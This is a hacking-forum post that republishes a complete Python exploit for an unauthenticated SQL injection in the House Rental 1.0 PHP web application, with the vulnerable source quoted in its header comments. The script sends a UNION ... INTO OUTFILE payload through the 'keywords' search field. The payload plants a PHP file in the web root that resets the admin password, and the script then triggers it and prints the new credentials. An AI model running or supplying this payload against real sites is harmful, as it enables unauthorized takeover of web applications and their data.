Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

House Rental 1.0 - 'keywords' SQL Injection

 Share


Recommended Posts

# Exploit Title: House Rental 1.0 - 'keywords' SQL Injection
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) 
# Date: 2020-08-07
# Vendor Homepage: https://projectworlds.in
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip
# Version: 1.0
# Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7
# CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
# OWASP Top Ten 2017: A1:2017-Injection
# CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9
# CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
# Vulnerability Description:
#   House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability allowing remote attackers
#   to execute arbitrary code on the hosting webserver via sending a malicious POST request.
# Vulnerable Source Code:
# /config/config.php
#   11  try {
#   12     $connect = new PDO("mysql:host=".dbhost."; dbname=".dbname, dbuser, dbpass);
#   13     $connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
# /index.php
#    5   if(isset($_POST['search'])) {
#    7     $keywords = $_POST['keywords'];
#   11     $keyword = explode(',', $keywords);
#   12     $concats = "(";
#   13     $numItems = count($keyword);
#   15     foreach ($keyword as $key => $value) {
#   17       if(++$i === $numItems){
#   18          $concats .= "'".$value."'";
#   19       }else{
#   20         $concats .= "'".$value."',";
#   23     $concats .= ")";
#   47         $stmt = $connect->prepare("SELECT * FROM room_rental_registrations_apartment WHERE country IN $concats OR country IN $loc OR state IN $concats OR state IN $loc OR city IN $concats OR city IN $loc OR address IN $concats OR address IN $loc OR rooms IN $concats OR landmark IN $concats OR landmark IN $loc OR rent IN $concats OR deposit IN $concats");
#   48         $stmt->execute();

import requests, sys, re, json
from colorama import Fore, Back, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
ok   = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
err  = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0]


def sig():
    SIG  = F[2]+"    .-----.._       ,--.              "+F[5]+"  .__              .__________\n"
    SIG += F[2]+"    |  ..    >  "+F[4]+"___"+F[2]+" |  | .--.         "+F[5]+"  |  |__ ___.__. __| _\\_____  \\  ______ ____  ____\n"
    SIG += F[2]+"    |  |.'  ,'"+F[4]+"-'"+F[2]+"* *"+F[4]+"'-."+F[2]+" |/  /__   __   "+F[5]+"  |  |  <   |  |/ __ |  _(__  < /  ____/ __ _/ ___\\\n"
    SIG += F[2]+"    |      <"+F[4]+"/ "+F[2]+"*  *  *"+F[4]+" \\   "+F[2]+"/   \\/   \\  "+F[5]+"  |   Y  \\___  / /_/ | /       \\\\___ \\\\  ___\\  \\___\n"
    SIG += F[2]+"    |  |>   )   "+F[2]+"* *"+F[4]+"   /    "+F[2]+"\\        \\ "+F[5]+"  |___|  / ____\____ |/______  /____  >\\___  \\___  >\n"
    SIG += F[2]+"    |____..- "+F[4]+"'-.._..-'"+F[2]+"_|\\___|._..\\___\\"+F[5]+"       \\/\\/         \\/       \\/     \\/     \\/    \\/\n"
    SIG += F[2]+"        "+F[2]+"_______github.com/boku7_____  "+F[5]+"         _______github.com/hyd3sec____\n_"+F[0]+S[0]
    return SIG



def header():
    head = S[3]+F[2]+'       ---  House Rental v1.0 | SQL Injection - Change Admin Password ---\n'+S[0]
    return head

def formatHelp(STRING):
    return S[3]+F[2]+STRING+S[0]

if __name__ == "__main__":
    print(header())
    print(sig())
    if len(sys.argv) != 2:
        print(err+formatHelp("Usage:\t python %s <WEBAPP_URL>" % sys.argv[0]))
        print(err+formatHelp("Example:\t python %s 'http://172.16.65.130/home-rental/'" % sys.argv[0]))
        sys.exit(-1)
    SERVER_URL  = sys.argv[1]
    if not re.match(r".*/$", SERVER_URL):
        SERVER_URL = SERVER_URL+'/'
    INDEX_URL   = SERVER_URL + 'index.php'
    EXECUTE_URL = SERVER_URL + 'execute.php'
    LOGIN_URL   = SERVER_URL + 'auth/login.php'
    s = requests.Session()
    get_session = s.get(INDEX_URL, verify=False) 
    pdata       = {'keywords':'1337\') UNION SELECT all \'1,UPDATED,ADMIN,PASSWORD,TO,boku,aaaaaa,city,landmark,rent,deposit,plotnum,apartName,aptNum,rooms,floor,purpose,own,area,address,accomd,<?php require "config/config.php";$stmt=$connect->prepare("UPDATE users set password=\\\'17d8e2e8233d9a6ae428061cb2cdf226\\\' WHERE username=\\\'admin\\\'");$stmt->execute();?>,image,open,other,1,2020-08-01 14:42:11,2020-08-01 14:42:11,1\' into OUTFILE \'../../htdocs/home-rental/execute.php\' -- boku', 'location':'','search':'search'}
    SQLi        = s.post(url=INDEX_URL, data=pdata, verify=False)
    if SQLi.status_code == 200:
        print(ok+"Sent "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" POST Request to "+F[5]+S[3]+INDEX_URL+F[0]+S[0]+" with "+F[2]+S[2]+"payload"+F[0]+S[0]+":")
        print(S[3]+F[2]+json.dumps(pdata, sort_keys=True, indent=4)+F[0]+S[0])
    else:
        print(err+'Cannot send payload to webserver.')
        sys.exit(-1)
    try:
        print(ok+"Executing "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" payload to change "+F[2]+S[2]+"admin password"+F[0]+S[0])
        EXECUTE     = s.get(url=EXECUTE_URL, verify=False)
    except:
        print(err+'Failed to connect to '++F[2]+S[3]+EXECUTE_URL+F[0]+S[0]+'to execute payload')
        sys.exit(-1)
    print(ok+F[2]+S[3]+"SQL Injection payload executed!"+F[0]+S[0])
    print(ok+F[2]+S[3]+"Login at "+F[5]+S[3]+LOGIN_URL+F[0]+S[0]+" with creds: "+F[2]+S[2]+"admin:boku"+F[0]+S[0])
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...